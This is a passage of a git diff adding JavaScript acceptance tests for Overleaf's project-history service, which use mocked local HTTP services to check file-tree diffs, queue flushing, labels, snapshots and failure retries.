], + timestamp: '2017-12-04T10:29:18.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: '', + textOperation: ['lorem ipsum'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + operation: 'edited', + pathname: 'new.tex', + }, + ], + }) + return done() + } + ) + }) + + it('should handle deletions of missing/invalid files ', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'missing.tex', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: '', + newPathname: '', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [], + }) + return done() + } + ) + }) + + return it('should handle renames of missing/invalid files ', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: {}, + }, + changes: [ + { + operations: [ + { + pathname: 'missing.tex', + newPathname: 'missing-renamed.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: '', + newPathname: 'missing-renamed-other.tex', + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + return ProjectHistoryClient.getFileTreeDiff( + this.projectId, + 3, + 5, + (error, diff) => { + if (error != null) { + throw error + } + expect(diff).to.deep.equal({ + diff: [], + }) + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/FlushManagerTests.js b/services/project-history/test/acceptance/js/FlushManagerTests.js new file mode 100644 index 0000000..d11346d --- /dev/null +++ b/services/project-history/test/acceptance/js/FlushManagerTests.js @@ -0,0 +1,242 @@ +import async from 'async' +import nock from 'nock' +import { expect } from 'chai' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('Flushing old queues', function () { + const historyId = new ObjectId().toString() + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + this.projectId = new ObjectId().toString() + this.docId = new ObjectId().toString() + this.fileId = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + changes: [], + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('retrying an unflushed project', function () { + describe('when the update is older than the cutoff', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.docId, + meta: { user_id: this.user_id, ts: new Date() }, + } + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.projectId, update, cb), + cb => + ProjectHistoryClient.setFirstOpTimestamp( + this.projectId, + Date.now() - 24 * 3600 * 1000, + cb + ), + ], + done + ) + }) + + it('flushes the project history queue', function (done) { + request.post( + { + url: 'http://127.0.0.1:3054/flush/old?maxAge=10800', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates' + ) + done() + } + ) + }) + + it('flushes the project history queue in the background when requested', function (done) { + request.post( + { + url: 'http://127.0.0.1:3054/flush/old?maxAge=10800&background=1', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + expect(body).to.equal('{"message":"running flush in background"}') + assert( + !this.flushCall.isDone(), + 'did not make calls to history service to store updates in the foreground' + ) + setTimeout(() => { + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates in the background' + ) + done() + }, 100) + } + ) + }) + }) + + describe('when the update is newer than the cutoff', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.docId, + meta: { user_id: this.user_id, ts: new Date() }, + } + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.projectId, update, cb), + cb => + ProjectHistoryClient.setFirstOpTimestamp( + this.projectId, + Date.now() - 60 * 1000, + cb + ), + ], + done + ) + }) + + it('does not flush the project history queue', function (done) { + request.post( + { + url: `http://127.0.0.1:3054/flush/old?maxAge=${3 * 3600}`, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + !this.flushCall.isDone(), + 'did not make calls to history service to store updates' + ) + done() + } + ) + }) + }) + + describe('when the update does not have a timestamp', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.docId, + meta: { user_id: this.user_id, ts: new Date() }, + } + this.startDate = Date.now() + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.projectId, update, cb), + cb => + ProjectHistoryClient.clearFirstOpTimestamp(this.projectId, cb), + ], + done + ) + }) + + it('flushes the project history queue anyway', function (done) { + request.post( + { + url: `http://127.0.0.1:3054/flush/old?maxAge=${3 * 3600}`, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates' + ) + ProjectHistoryClient.getFirstOpTimestamp( + this.projectId, + (err, result) => { + if (err) { + return done(err) + } + expect(result).to.be.null + done() + } + ) + } + ) + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/GetChangesInChunkSince.js b/services/project-history/test/acceptance/js/GetChangesInChunkSince.js new file mode 100644 index 0000000..2c8c44b --- /dev/null +++ b/services/project-history/test/acceptance/js/GetChangesInChunkSince.js @@ -0,0 +1,158 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import Core from 'overleaf-editor-core' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import latestChunk from '../fixtures/chunks/7-8.json' with { type: 'json' } +import previousChunk from '../fixtures/chunks/4-6.json' with { type: 'json' } +import firstChunk from '../fixtures/chunks/0-3.json' with { type: 'json' } +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('GetChangesInChunkSince', function () { + let projectId, historyId + beforeEach(function (done) { + projectId = new ObjectId().toString() + historyId = new ObjectId().toString() + ProjectHistoryApp.ensureRunning(error => { + if (error) throw error + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + + ProjectHistoryClient.initializeProject(historyId, (error, olProject) => { + if (error) throw error + MockWeb() + .get(`/project/${projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: olProject.id } }, + }) + + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/7/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/5/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/4/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/3/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/2/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/1/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + MockHistoryStore() + .get(`/api/projects/${historyId}/versions/0/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + + done() + }) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + function expectChangesSince(version, n, changes, done) { + ProjectHistoryClient.getChangesInChunkSince( + projectId, + version, + {}, + (error, got) => { + if (error) throw error + expect(got.latestStartVersion).to.equal(6) + expect(got.changes).to.have.length(n) + expect(got.changes.map(c => Core.Change.fromRaw(c))).to.deep.equal( + changes.map(c => Core.Change.fromRaw(c)) + ) + done() + } + ) + } + + const cases = { + 8: { + name: 'when up-to-date, return zero changes', + n: 0, + changes: [], + }, + 7: { + name: 'when one version behind, return one change', + n: 1, + changes: latestChunk.chunk.history.changes.slice(1), + }, + 6: { + name: 'when at current chunk boundary, return latest chunk in full', + n: 2, + changes: latestChunk.chunk.history.changes, + }, + 5: { + name: 'when one version behind last chunk, return one change', + n: 1, + changes: previousChunk.chunk.history.changes.slice(2), + }, + 4: { + name: 'when in last chunk, return two changes', + n: 2, + changes: previousChunk.chunk.history.changes.slice(1), + }, + 3: { + name: 'when at previous chunk boundary, return just the previous chunk', + n: 3, + changes: previousChunk.chunk.history.changes, + }, + 2: { + name: 'when at end of first chunk, return one change', + n: 1, + changes: firstChunk.chunk.history.changes.slice(2), + }, + 1: { + name: 'when in first chunk, return two changes', + n: 2, + changes: firstChunk.chunk.history.changes.slice(1), + }, + 0: { + name: 'when from zero, return just the first chunk', + n: 3, + changes: firstChunk.chunk.history.changes, + }, + } + + for (const [since, { name, n, changes }] of Object.entries(cases)) { + it(name, function (done) { + expectChangesSince(since, n, changes, done) + }) + } + + it('should return an error when past the end version', function (done) { + ProjectHistoryClient.getChangesInChunkSince( + projectId, + 9, + { allowErrors: true }, + (error, _body, statusCode) => { + if (error) throw error + expect(statusCode).to.equal(400) + done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/HealthCheckTests.js b/services/project-history/test/acceptance/js/HealthCheckTests.js new file mode 100644 index 0000000..1fc9efa --- /dev/null +++ b/services/project-history/test/acceptance/js/HealthCheckTests.js @@ -0,0 +1,76 @@ +/* eslint-disable + no-undef, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { expect } from 'chai' +import settings from '@overleaf/settings' +import request from 'request' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +describe('Health Check', function () { + beforeEach(function (done) { + const projectId = new ObjectId() + const historyId = new ObjectId().toString() + settings.history.healthCheck = { project_id: projectId } + return ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + MockWeb() + .get(`/project/${projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + + return ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + return it('should respond to the health check', function (done) { + return request.get( + { + url: 'http://127.0.0.1:3054/health_check', + }, + (error, res, body) => { + if (error != null) { + return callback(error) + } + expect(res.statusCode).to.equal(200) + return done() + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/LabelsTests.js b/services/project-history/test/acceptance/js/LabelsTests.js new file mode 100644 index 0000000..2812add --- /dev/null +++ b/services/project-history/test/acceptance/js/LabelsTests.js @@ -0,0 +1,282 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('Labels', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + + this.historyId = new ObjectId().toString() + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + ProjectHistoryClient.initializeProject( + this.historyId, + (error, olProject) => { + if (error != null) { + throw error + } + this.project_id = new ObjectId().toString() + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: olProject.id } }, + }) + + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/7/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + .persist() + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/8/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + .persist() + + this.comment = 'a saved version comment' + this.comment2 = 'another saved version comment' + this.user_id = new ObjectId().toString() + this.created_at = new Date(1) + done() + } + ) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + it('can create and get labels', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([label]) + done() + }) + } + ) + }) + + it('can create and get labels with no user id', function (done) { + const userId = undefined + ProjectHistoryClient.createLabel( + this.project_id, + userId, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([label]) + done() + }) + } + ) + }) + + it('can delete labels', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.deleteLabel(this.project_id, label.id, error => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([]) + done() + }) + }) + } + ) + }) + + it('can delete labels for the current user', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.deleteLabelForUser( + this.project_id, + this.user_id, + label.id, + error => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([]) + done() + }) + } + ) + } + ) + }) + + it('can transfer ownership of labels', function (done) { + const fromUser = new ObjectId().toString() + const toUser = new ObjectId().toString() + ProjectHistoryClient.createLabel( + this.project_id, + fromUser, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.createLabel( + this.project_id, + fromUser, + 7, + this.comment2, + this.created_at, + (error, label2) => { + if (error != null) { + throw error + } + ProjectHistoryClient.transferLabelOwnership( + fromUser, + toUser, + error => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels( + this.project_id, + (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([ + { + id: label.id, + comment: label.comment, + version: label.version, + created_at: label.created_at, + user_id: toUser, + }, + { + id: label2.id, + comment: label2.comment, + version: label2.version, + created_at: label2.created_at, + user_id: toUser, + }, + ]) + done() + } + ) + } + ) + } + ) + } + ) + }) + + it('should return labels with summarized updates', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 8, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.getSummarizedUpdates( + this.project_id, + { min_count: 1 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates).to.deep.equal({ + nextBeforeTimestamp: 6, + updates: [ + { + fromV: 6, + toV: 8, + meta: { + users: ['5a5637efdac84e81b71014c4', 31], + start_ts: 1512383567277, + end_ts: 1512383572877, + }, + pathnames: ['bar.tex', 'main.tex'], + project_ops: [], + labels: [ + { + id: label.id.toString(), + comment: this.comment, + version: 8, + user_id: this.user_id, + created_at: this.created_at.toISOString(), + }, + ], + }, + ], + }) + done() + } + ) + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/LatestSnapshotTests.js b/services/project-history/test/acceptance/js/LatestSnapshotTests.js new file mode 100644 index 0000000..6e989ff --- /dev/null +++ b/services/project-history/test/acceptance/js/LatestSnapshotTests.js @@ -0,0 +1,78 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('LatestSnapshot', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + + this.historyId = new ObjectId().toString() + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + ProjectHistoryClient.initializeProject( + this.historyId, + (error, v1Project) => { + if (error) { + throw error + } + this.projectId = new ObjectId().toString() + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: v1Project.id } }, + }) + done() + } + ) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + it('should return the snapshot with applied changes, metadata and without full content', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + + ProjectHistoryClient.getLatestSnapshot(this.projectId, (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal({ + snapshot: { + files: { + 'main.tex': { + hash: 'f28571f561d198b87c24cc6a98b78e87b665e22d', + stringLength: 20649, + operations: [{ textOperation: [1912, 'Hello world', 18726] }], + metadata: { main: true }, + }, + 'foo.tex': { + hash: '4f785a4c192155b240e3042b3a7388b47603f423', + stringLength: 41, + operations: [{ textOperation: [26, '\n\nFour five six'] }], + }, + }, + }, + version: 3, + }) + done() + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/ReadingASnapshotTests.js b/services/project-history/test/acceptance/js/ReadingASnapshotTests.js new file mode 100644 index 0000000..af373bf --- /dev/null +++ b/services/project-history/test/acceptance/js/ReadingASnapshotTests.js @@ -0,0 +1,298 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('ReadSnapshot', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + + this.historyId = new ObjectId().toString() + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + ProjectHistoryClient.initializeProject( + this.historyId, + (error, v1Project) => { + if (error) { + throw error + } + this.projectId = new ObjectId().toString() + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: v1Project.id } }, + }) + done() + } + ) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('of a text file', function () { + it('should return the snapshot of a doc at the given version', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'foo.tex', + 5, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nine\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + + it('should return the snapshot of a doc at a different version', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'foo.tex', + 4, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nince\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + + it('should return the snapshot of a doc after a rename version', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'bar.tex', + 6, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nine\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + }) + + describe('of a binary file', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + binary_file: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 3, + }, + authors: [], + }) + }) + + it('should return the snapshot of the file at the given version', function (done) { + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'binary_file', + 4, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + + it("should return an error when the blob doesn't exist", function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + binary_file: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 3, + }, + authors: [], + }) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .reply(404) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'binary_file', + 4, + { allowErrors: true }, + (error, body, statusCode) => { + if (error) { + throw error + } + expect(statusCode).to.equal(500) + done() + } + ) + }) + + it('should return an error when the blob request errors', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + binary_file: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 3, + }, + authors: [], + }) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithError('oh no!') + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'binary_file', + 4, + { allowErrors: true }, + (error, body, statusCode) => { + if (error) { + throw error + } + expect(statusCode).to.equal(500) + done() + } + ) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/RetryTests.js b/services/project-history/test/acceptance/js/RetryTests.js new file mode 100644 index 0000000..1fa356e --- /dev/null +++ b/services/project-history/test/acceptance/js/RetryTests.js @@ -0,0 +1,194 @@ +import async from 'async' +import nock from 'nock' +import { expect } from 'chai' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const MockCallback = () => nock('http://127.0.0.1') + +describe('Retrying failed projects', function () { + const historyId = new ObjectId().toString() + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + this.project_id = new ObjectId().toString() + this.doc_id = new ObjectId().toString() + this.file_id = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + changes: [], + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('retrying project history', function () { + describe('when there is a soft failure', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.doc_id, + meta: { user_id: this.user_id, ts: new Date() }, + } + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb), + cb => + ProjectHistoryClient.setFailure( + { + project_id: this.project_id, + attempts: 1, + error: 'soft-error', + }, + cb + ), + ], + done + ) + }) + + it('flushes the project history queue', function (done) { + request.post( + { + url: 'http://127.0.0.1:3054/retry/failures?failureType=soft&limit=1&timeout=10000', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates' + ) + done() + } + ) + }) + + it('retries in the background when requested', function (done) { + this.callback = MockCallback() + .matchHeader('Authorization', '123') + .get('/ping') + .reply(200) + request.post( + { + url: 'http://127.0.0.1:3054/retry/failures?failureType=soft&limit=1&timeout=10000&callbackUrl=http%3A%2F%2F127.0.0.1%2Fping', + headers: { + 'X-CALLBACK-Authorization': '123', + }, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + expect(body).to.equal( + '{"retryStatus":"running retryFailures in background"}' + ) + assert( + !this.flushCall.isDone(), + 'did not make calls to history service to store updates in the foreground' + ) + setTimeout(() => { + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates in the background' + ) + assert(this.callback.isDone(), 'hit the callback url') + done() + }, 100) + } + ) + }) + }) + + describe('when there is a hard failure', function () { + beforeEach(function (done) { + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + ProjectHistoryClient.setFailure( + { + project_id: this.project_id, + attempts: 100, + error: 'hard-error', + }, + done + ) + }) + + it('calls web to resync the project', function (done) { + const resyncCall = MockWeb() + .post(`/project/${this.project_id}/history/resync`) + .reply(200) + + request.post( + { + url: 'http://127.0.0.1:3054/retry/failures?failureType=hard&limit=1&timeout=10000', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert(resyncCall.isDone(), 'made a call to web to resync project') + done() + } + ) + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/SendingUpdatesTests.js b/services/project-history/test/acceptance/js/SendingUpdatesTests.js new file mode 100644 index 0000000..dce5474 --- /dev/null +++ b/services/project-history/test/acceptance/js/SendingUpdatesTests.js @@ -0,0 +1,2197 @@ +import { 